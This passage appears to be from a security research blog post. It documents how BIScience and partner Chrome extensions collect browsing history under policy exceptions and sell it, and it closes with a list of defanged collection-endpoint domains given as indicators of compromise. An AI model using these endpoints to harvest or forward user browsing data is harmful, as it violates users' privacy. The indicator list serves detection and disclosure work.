As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.

We have the receipts contracts, emails, and more to prove BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs in servers, therefore they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege they offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com